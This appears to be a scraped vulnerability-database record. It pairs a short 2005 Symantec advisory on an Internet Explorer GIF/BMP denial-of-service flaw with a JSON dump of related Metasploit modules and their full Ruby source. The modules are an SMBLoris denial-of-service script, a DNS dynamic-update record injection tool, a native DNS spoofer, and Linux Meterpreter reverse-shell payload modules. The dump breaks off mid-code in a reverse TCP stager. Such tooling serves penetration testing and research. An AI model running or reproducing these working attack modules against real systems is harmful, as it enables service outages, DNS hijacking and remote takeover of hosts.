Microsoft Internet Explorer Unspecified GIF And BMP Denial Of Service Vulnerability
2005-06-14T00:00:00
ID SMNTC-13947 Type symantec Reporter Symantec Security Response Modified 2005-06-14T00:00:00
Description
Description
Microsoft Internet Explorer is prone to a denial of service vulnerability when rendering malformed GIF and BMP images. Malformed images for other file formats may also cause a similar condition, though the vendor has not provided any further information. The vendor has not released any further information about this issue other than to state that it is addressed by the Cumulative Security Update For Internet Explorer.
Technologies Affected
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.0.1 SP1
Microsoft Internet Explorer 5.0.1 SP2
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP4
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.5 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0 SP2 do not use
Recommendations
Do not follow links provided by unknown or untrusted sources.
Users should be wary of visiting Web sites of questionable integrity, especially if solicited to do so by an unfamiliar or untrusted source through email or other means.
Microsoft has released a cumulative update for Internet Explorer to address supported versions of the browser. Fixes for Windows 98/SE/ME can be obtained through Windows Update.
{"hash": "37eeb8b2750ee26f533c9df26a68eb2eae984a8d7f88efbba37f4005de0705d4", "id": "SMNTC-13947", "lastseen": "2018-03-14T00:21:46", "viewCount": 0, "hashmap": [{"hash": "091d3b9b0cdb136b0dda65fe2b443f6e", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9a50585771a87ca043912a10d8cef589", "key": "description"}, {"hash": "9bb58807bdf160540b8e0fb131d3daae", "key": "href"}, {"hash": "90e76f084433e9d4c84582ce47deb04e", "key": "modified"}, {"hash": "90e76f084433e9d4c84582ce47deb04e", "key": "published"}, {"hash": "75831fc2f5bbceadb9d9729da7a25ae7", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "60e010c3e7a7fa555c210cc25951e6fd", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "bulletinFamily": "software", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-03-14T00:21:46"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-2432"]}], "modified": "2018-03-14T00:21:46"}, "vulnersScore": 0.6}, "type": "symantec", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a denial of service vulnerability when rendering malformed GIF and BMP images. Malformed images for other file formats may also cause a similar condition, though the vendor has not provided any further information. The vendor has not released any further information about this issue other than to state that it is addressed by the Cumulative Security Update For Internet Explorer.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 5.0.1 \n * Microsoft Internet Explorer 5.0.1 SP1 \n * Microsoft Internet Explorer 5.0.1 SP2 \n * Microsoft Internet Explorer 5.0.1 SP3 \n * Microsoft Internet Explorer 5.0.1 SP4 \n * Microsoft Internet Explorer 5.5 \n * Microsoft Internet Explorer 5.5 SP1 \n * Microsoft Internet Explorer 5.5 SP2 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 do not use \n\n### Recommendations\n\n**Do not follow links provided by unknown or untrusted sources.** \nUsers should be wary of visiting Web sites of questionable integrity, especially if solicited to do so by an unfamiliar or untrusted source through email or other means.\n\nMicrosoft has released a cumulative update for Internet Explorer to address supported versions of the browser. Fixes for Windows 98/SE/ME can be obtained through Windows Update.\n", "title": "Microsoft Internet Explorer Unspecified GIF And BMP Denial Of Service Vulnerability", "history": [{"bulletin": {"hash": "de059268b7b1768bce398aa8c92b57033a43a7fa086fa0209c5629fefc9b5d00", "viewCount": 0, "edition": 1, "lastseen": "2016-09-04T11:42:21", "history": [], "objectVersion": "1.2", "hashmap": [{"hash": "75831fc2f5bbceadb9d9729da7a25ae7", "key": "references"}, {"hash": "90e76f084433e9d4c84582ce47deb04e", "key": "published"}, {"hash": "60b1c372b93037a62c9d5e06b7a9988f", "key": "href"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "213b84da680b00297d1f6406c5dae180", "key": "description"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "aa05ff541346bb1b9e9c8d1066e7b777", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "90e76f084433e9d4c84582ce47deb04e", "key": "modified"}, {"hash": "60e010c3e7a7fa555c210cc25951e6fd", "key": "title"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "cvelist": [], "bulletinFamily": "software", "published": "2005-06-14T00:00:00", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a denial of service vulnerability when rendering malformed GIF and BMP images. Malformed images for other file formats may also cause a similar condition, though the vendor has not provided any further information. The vendor has not released any further information about this issue other than to state that it is addressed by the Cumulative Security Update For Internet Explorer. \n\n### Technologies Affected\n\n * Microsoft Internet Explorer 5.0.1\n * Microsoft Internet Explorer 5.0.1 SP1\n * Microsoft Internet Explorer 5.0.1 SP2\n * Microsoft Internet Explorer 5.0.1 SP3\n * Microsoft Internet Explorer 5.0.1 SP4\n * Microsoft Internet Explorer 5.5\n * Microsoft Internet Explorer 5.5 SP1\n * Microsoft Internet Explorer 5.5 SP2\n * Microsoft Internet Explorer 6.0\n * Microsoft Internet Explorer 6.0 SP1\n * Microsoft Internet Explorer 6.0 SP2 - do not use\n\n### Recommendations\n\n#### Do not follow links provided by unknown or untrusted sources.\n\nUsers should be wary of visiting Web sites of questionable integrity, especially if solicited to do so by an unfamiliar or untrusted source through email or other means. \n\nMicrosoft has released a cumulative update for Internet Explorer to address supported versions of the browser. Fixes for Windows 98/SE/ME can be obtained through Windows Update. \n", "cvss": {"score": 0.0, "vector": "NONE"}, "id": "SMNTC-13947", "reporter": "Symantec Security Response", "references": ["http://www.microsoft.com/technet/security/bulletin/MS05-025.mspx"], "affectedSoftware": [{"version": "5.5", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP3", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "6.0", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.5 SP2", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "use", "name": "Microsoft Internet Explorer 6.0 SP2 - do not", "operator": "eq"}, {"version": "5.0.1", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "6.0 SP1", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP4", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.5 SP1", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP1", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP2", "name": "Microsoft Internet Explorer", "operator": "eq"}], "title": "Microsoft Internet Explorer Unspecified GIF And BMP Denial Of Service Vulnerability", "modified": "2005-06-14T00:00:00", "enchantments": {"score": {"value": 2.6, "modified": "2016-09-04T11:42:21"}}, "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=13947", "type": "symantec"}, "lastseen": "2016-09-04T11:42:21", "edition": 1, "differentElements": ["description", "href", "affectedSoftware"]}], "objectVersion": "1.3", "cvelist": [], "published": "2005-06-14T00:00:00", "references": ["http://www.microsoft.com/technet/security/bulletin/MS05-025.mspx"], "reporter": "Symantec Security Response", "affectedSoftware": [{"version": "6.0 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "6.0 SP2 do not use ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP4 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP3 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP1 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.5 SP1 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.5 SP2 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 SP2 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.0.1 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "5.5 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "6.0 SP1 ", "name": "Microsoft Internet Explorer", "operator": "eq"}], "modified": "2005-06-14T00:00:00", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/13947"}
{"metasploit": [{"lastseen": "2019-09-02T08:31:42", "bulletinFamily": "exploit", "description": "The SMBLoris attack consumes large chunks of memory in the target by sending SMB requests with the NetBios Session Service(NBSS) Length Header value set to the maximum possible value. By keeping these connections open and initiating large numbers of these sessions, the memory does not get freed, and the server grinds to a halt. This vulnerability was originally disclosed by Sean Dillon and Zach Harding. DISCALIMER: This module opens a lot of simultaneous connections. Please check your system's ULIMIT to make sure it can handle it. This module will also run continuously until stopped.\n", "modified": "2018-03-23T19:55:18", "published": "2017-08-03T16:32:57", "id": "MSF:AUXILIARY/DOS/SMB/SMB_LORIS", "href": "", "type": "metasploit", "title": "SMBLoris NBSS Denial of Service", "sourceData": "#!/usr/bin/env ruby\n\nrequire 'socket'\nrequire 'metasploit'\n\nrequire 'bindata'\n\nclass NbssHeader < BinData::Record\n endian :little\n uint8 :message_type\n bit7 :flags\n bit17 :message_length\nend\n\nmetadata = {\n name: 'SMBLoris NBSS Denial of Service',\n description: %q{\n The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.\n },\n authors: [\n 'thelightcosine',\n 'Adam Cammack <adam_cammack[at]rapid7.com>'\n ],\n date: '2017-06-29',\n references: [\n { type: 'url', ref: 'http://smbloris.com/' }\n ],\n type: 'dos',\n options: {\n rhost: {type: 'address', description: 'The target address', required: true, default: nil},\n rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},\n }\n}\n\ndef run(args)\n header = NbssHeader.new\n header.message_length = 0x01FFFF\n\n last_reported = 0\n warned = false\n n_loops = 0\n sockets = []\n\n target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)\n\n Metasploit.logging_prefix = \"#{target.inspect_sockaddr} - \"\n\n while true do\n begin\n sockets.delete_if do |s|\n s.closed?\n end\n\n nsock = target.connect(timeout: 360)\n nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)\n nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))\n nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))\n nsock.setsockopt(Socket::Option.linger(true, 60))\n nsock.write(header.to_binary_s)\n sockets << nsock\n\n n_loops += 1\n if last_reported != sockets.length\n if n_loops % 100 == 0\n last_reported = sockets.length\n Metasploit.log \"#{sockets.length} socket(s) open\", level: 'info'\n end\n elsif n_loops % 1000 == 0\n Metasploit.log \"Holding steady at #{sockets.length} socket(s) open\", level: 'info'\n end\n rescue Interrupt\n break\n sockets.each &:close\n rescue Errno::EMFILE\n Metasploit.log \"At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.\", level: 'warning' unless warned\n warned = true\n sockets.slice(0).close\n rescue Exception => e\n Metasploit.log \"Exception sending packet: #{e.message}\", level: 'error'\n end\n end\nend\n\nif __FILE__ == $PROGRAM_NAME\n Metasploit.run(metadata, method(:run))\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/smb/smb_loris.rb"}, {"lastseen": "2019-08-30T10:24:12", "bulletinFamily": "exploit", "description": "This module allows adding and/or deleting a record to any remote DNS server that allows unrestricted dynamic updates.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-22T22:47:04", "id": "MSF:AUXILIARY/ADMIN/DNS/DYN_DNS_UPDATE", "href": "", "type": "metasploit", "title": "DNS Server Dynamic Update Record Injection", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'dnsruby'\n\nclass MetasploitModule < Msf::Auxiliary\n\n def initialize\n super(\n 'Name' => 'DNS Server Dynamic Update Record Injection',\n 'Description' => %q{\n This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.},\n 'Author' => [\n 'King Sabri <king.sabri[at]gmail.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>'\n ],\n 'References' => [\n ['URL', 'http://www.tenable.com/plugins/index.php?view=single&id=35372'],\n ['URL', 'https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject'],\n ['URL', 'https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/'],\n ['URL', 'https://github.com/ChrisTruncer/PenTestScripts/blob/master/DNSInject.py']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['UPDATE', {'Description' => 'Add or update a record. (default)'}],\n ['ADD', {'Description' => 'Add a new record. Fail if it already exists.'}],\n ['DELETE', {'Description' => 'Delete an existing record.'}]\n ],\n 'DefaultAction' => 'UPDATE'\n )\n\n register_options([\n OptString.new('DOMAIN', [true, 'The domain name']),\n OptAddress.new('RHOST', [true, 'The vulnerable DNS server IP address']),\n OptString.new('HOSTNAME', [true, 'The name record you want to add']),\n OptAddress.new('IP', [false, 'The IP you want to assign to the record']),\n OptString.new('VALUE', [false, 'The string to be added with TXT or CNAME record']),\n OptEnum.new('TYPE', [true, 'The record type you want to add.', 'A', ['A', 'AAAA', 'CNAME', 'TXT']]),\n OptAddress.new('CHOST', [false, 'The source address to use for queries and updates'])\n ])\n\n deregister_options('RPORT')\n end\n\n def record_action(type, type_enum, value, action)\n # Send the update to the zone's primary master.\n domain = datastore['DOMAIN']\n fqdn = \"#{datastore['HOSTNAME']}.#{domain}\"\n opts = {nameserver: datastore['RHOST']}\n if datastore['CHOST'] && datastore['CHOST'] != \"\"\n if Rex::Socket.is_ipv4?(datastore['CHOST'])\n opts[:src_address] = datastore['CHOST']\n elsif Rex::Socket.is_ipv6?(datastore['CHOST'])\n opts[:src_address6] = datastore['CHOST']\n end\n end\n resolver = Dnsruby::Resolver.new(opts)\n update = Dnsruby::Update.new(domain)\n updated = false\n case\n when action == :resolve\n begin\n answer = resolver.query(fqdn, type)\n print_good \"Found existing #{type} record for #{fqdn}\"\n return true\n rescue Dnsruby::ResolvError, IOError => e\n print_good \"Did not find an existing #{type} record for #{fqdn}\"\n vprint_error \"Query failed: #{e.message}\"\n return false\n end\n when action == :add\n print_status(\"Sending dynamic DNS add message...\")\n update.absent(\"#{fqdn}.\", type)\n update.add(\"#{fqdn}.\", type_enum, 86400, value)\n begin\n resolver.send_message(update)\n print_good \"The record '#{fqdn} => #{value}' has been added!\"\n updated = true\n rescue Dnsruby::ResolvError, IOError => e\n print_error \"Cannot add #{fqdn}\"\n vprint_error \"The DNS server may not be vulnerable, or there may be a preexisting static record.\"\n vprint_error \"Update failed: #{e.message}\"\n end\n when action == :delete\n begin\n print_status(\"Sending dynamic DNS delete message...\")\n update.present(fqdn, type)\n update.delete(fqdn, type)\n resolver.send_message(update)\n print_good(\"The record '#{fqdn} => #{value}' has been deleted!\")\n updated = true\n rescue Dnsruby::ResolvError, IOError => e\n print_error \"Cannot delete #{fqdn}\"\n vprint_error \"The DNS server may not be vulnerable, or there may be a preexisting static record.\"\n vprint_error \"Update failed: #{e.message}\"\n end\n end\n updated\n end\n\n def update_record(type:, type_enum:, value:, value_name:)\n if value.nil? || value == \"\"\n print_error \"Record type #{type} requires the #{value_name} parameter to be specified\"\n return\n end\n force = datastore['CHOST'] && datastore['CHOST'] != \"\"\n case\n when action.name == 'UPDATE'\n if force\n record_action(type, type_enum, value, :delete)\n record_action(type, type_enum, value, :add)\n else\n if record_action(type, type_enum, value, :resolve)\n if record_action(type, type_enum, value, :delete)\n record_action(type, type_enum, value, :add)\n end\n else\n record_action(type, type_enum, value, :add)\n end\n end\n when action.name == 'ADD'\n if force\n record_action(type, type_enum, value, :add)\n else\n if record_action(type, type_enum, value, :resolve) == false\n record_action(type, type_enum, value, :add)\n else\n print_error \"Record already exists, try DELETE or UPDATE\"\n end\n end\n when action.name == 'DELETE'\n if force\n record_action(type, type_enum, value, :delete)\n else\n if record_action(type, type_enum, value, :resolve)\n record_action(type, type_enum, value, :delete)\n else\n print_error \"Record does not exist, not deleting\"\n end\n end\n end\n end\n\n def run\n ip = datastore['IP']\n value = datastore['VALUE']\n begin\n case\n when datastore['TYPE'] == 'A'\n update_record(type: 'A', type_enum: Dnsruby::Types.A, value: ip, value_name: 'IP')\n when datastore['TYPE'] == 'AAAA'\n update_record(type: 'AAAA', type_enum: Dnsruby::Types.AAAA, value: ip, value_name: 'IP')\n when datastore['TYPE'] == 'CNAME'\n update_record(type: 'CNAME', type_enum: Dnsruby::Types.CNAME, value: value, value_name: 'VALUE')\n when datastore['TYPE'] == 'TXT'\n update_record(type: 'TXT', type_enum: Dnsruby::Types.TXT, value: value, value_name: 'VALUE')\n else\n print_error \"Invalid Record Type!\"\n end\n rescue ArgumentError => e\n print_error(e.message)\n rescue Dnsruby::OtherResolvError\n print_error(\"Connection Refused!\")\n rescue Dnsruby::DecodeError\n print_error(\"Invalid DNS reply, ensure you are connecting to a DNS server\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dns/dyn_dns_update.rb"}, {"lastseen": "2019-09-05T14:38:17", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/X64/METERPRETER_REVERSE_HTTPS", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTPS Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_https'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_x64_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1046512\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttps,\n 'Session' => Msf::Sessions::Meterpreter_x64_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'https',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb"}, {"lastseen": "2019-09-17T00:30:26", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/X64/METERPRETER_REVERSE_TCP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse TCP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_x64_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1046512\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse TCP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::Meterpreter_x64_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'tcp',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb"}, {"lastseen": "2019-09-05T23:06:47", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/X64/METERPRETER_REVERSE_HTTP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_http'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_x64_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1046512\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttp,\n 'Session' => Msf::Sessions::Meterpreter_x64_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'http',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb"}, {"lastseen": "2019-09-13T05:28:05", "bulletinFamily": "exploit", "description": "This module provides a Rex based DNS service to resolve queries intercepted via the capture mixin. Configure STATIC_ENTRIES to contain host-name mappings desired for spoofing using a hostsfile or space/semicolon separated entries. In default configuration, the service operates as a normal native DNS server with the exception of consuming from and writing to the wire as opposed to a listening socket. Best when compromising routers or spoofing L2 in order to prevent return of the real reply which causes a race condition. The method by which replies are filtered is up to the user (though iptables works fine).\n", "modified": "2019-08-15T23:10:44", "published": "2016-07-11T22:10:01", "id": "MSF:AUXILIARY/SPOOF/DNS/NATIVE_SPOOFER", "href": "", "type": "metasploit", "title": "Native DNS Spoofer (Example)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/dns'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Capture\n include Msf::Exploit::Remote::DNS::Client\n include Msf::Exploit::Remote::DNS::Server\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Native DNS Spoofer (Example)',\n 'Description' => %q{\n This module provides a Rex based DNS service to resolve queries intercepted\n via the capture mixin. Configure STATIC_ENTRIES to contain host-name mappings\n desired for spoofing using a hostsfile or space/semicolon separated entries.\n In default configuration, the service operates as a normal native DNS server\n with the exception of consuming from and writing to the wire as opposed to a\n listening socket. Best when compromising routers or spoofing L2 in order to\n prevent return of the real reply which causes a race condition. The method\n by which replies are filtered is up to the user (though iptables works fine).\n },\n 'Author' => 'RageLtMan <rageltman[at]sempervictus>',\n 'License' => MSF_LICENSE,\n 'References' => []\n ))\n\n register_options(\n [\n OptString.new('FILTER', [false, 'The filter string for capturing traffic', 'dst port 53']),\n OptAddress.new('SRVHOST', [true, 'The local host to listen on for DNS services.', '127.0.2.2'])\n ])\n\n deregister_options('PCAPFILE')\n end\n\n #\n # Wrapper for service execution and cleanup\n #\n def run\n begin\n start_service\n capture_traffic\n service.wait\n rescue Rex::BindFailed => e\n print_error \"Failed to bind to port #{datastore['RPORT']}: #{e.message}\"\n ensure\n @capture_thread.kill if @capture_thread\n close_pcap\n stop_service(true)\n end\n end\n\n #\n # Generates reply with src and dst reversed\n # Maintains original packet structure, proto, etc, changes ip_id\n #\n def reply_packet(pack)\n rep = pack.dup\n rep.eth_dst, rep.eth_src = rep.eth_src, rep.eth_dst\n rep.ip_dst, rep.ip_src = rep.ip_src, rep.ip_dst\n if pack.is_udp?\n rep.udp_dst, rep.udp_src = rep.udp_src, rep.udp_dst\n else\n rep.tcp_dst, rep.tcp_src = rep.tcp_src, rep.tcp_dst\n end\n rep.ip_id = StructFu::Int16.new(rand(2**16))\n return rep\n end\n\n #\n # Configures capture and handoff\n #\n def capture_traffic\n check_pcaprub_loaded()\n ::Socket.do_not_reverse_lookup = true # Mac OS X workaround\n open_pcap({'FILTER' => datastore['FILTER']})\n @capture_thread = Rex::ThreadFactory.spawn(\"DNSSpoofer\", false) do\n each_packet do |pack|\n begin\n parsed = PacketFu::Packet.parse(pack)\n reply = reply_packet(parsed)\n service.dispatch_request(reply, parsed.payload)\n rescue => e\n vprint_status(\"PacketFu could not parse captured packet\")\n dlog(e.backtrace)\n end\n end\n end\n end\n\n #\n # Creates Proc to handle incoming requests\n #\n def on_dispatch_request(cli,data)\n peer = \"#{cli.ip_daddr}:\" << (cli.is_udp? ? \"#{cli.udp_dst}\" : \"#{cli.tcp_dst}\")\n # Deal with non DNS traffic\n begin\n req = Packet.encode_drb(data)\n rescue => e\n print_error(\"Could not decode payload segment of packet from #{peer}, check log\")\n dlog e.backtrace\n return\n end\n answered = []\n # Find cached items, remove request from forwarded packet\n req.question.each do |ques|\n cached = service.cache.find(ques.qname, ques.qtype.to_s)\n if cached.empty?\n next\n else\n req.answer = (req.answer + cached).uniq\n answered << ques\n end\n end\n if answered.count < req.question.count and service.fwd_res\n if !req.header.recursive?\n vprint_status(\"Recursion forbidden in query for #{req.question.first.name} from #{peer}\")\n else\n forward = req.dup\n forward.question = req.question - answered\n forwarded = service.fwd_res.send(Packet.validate(forward))\n forwarded.answer.each do |ans|\n rstring = ans.respond_to?(:address) ? \"#{ans.name}:#{ans.address}\" : ans.name\n vprint_status(\"Caching response #{rstring} #{ans.type}\")\n service.cache.cache_record(ans)\n end unless service.cache.nil?\n # Merge the answers and use the upstream response\n forwarded.answer = (req.answer + forwarded.answer).uniq\n req = forwarded\n end\n end\n service.send_response(cli, Packet.validate(Packet.generate_response(req)).data)\n end\n\n #\n # Creates Proc to handle outbound responses\n #\n def on_send_response(cli,data)\n cli.payload = data\n cli.recalc\n inject cli.to_s\n sent_info(cli,data) if datastore['VERBOSE']\n end\n\n #\n # Prints information about spoofed packet after injection to reduce latency of operation\n # Shown to improve response time by >50% from ~1ms -> 0.3-0.4ms\n #\n def sent_info(cli,data)\n net = Packet.encode_net(data)\n peer = \"#{cli.ip_daddr}:\" << (cli.is_udp? ? \"#{cli.udp_dst}\" : \"#{cli.tcp_dst}\")\n asked = net.question.map(&:qname).join(', ')\n vprint_good(\"Sent packet with header:\\n#{cli.inspect}\")\n vprint_good(\"Spoofed records for #{asked} to #{peer}\")\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/spoof/dns/native_spoofer.rb"}, {"lastseen": "2019-09-05T17:09:22", "bulletinFamily": "exploit", "description": "Inject the mettle server payload (staged). Connect back to the attacker\n", "modified": "2019-09-04T21:06:44", "published": "2011-05-20T23:51:19", "id": "MSF:PAYLOAD/LINUX/X64/METERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Linux Mettle x64, Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/linux/x64/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 130\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux::ReverseTcp_x64\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['ricky', 'tkmru'],\n 'License' => MSF_LICENSE,\n 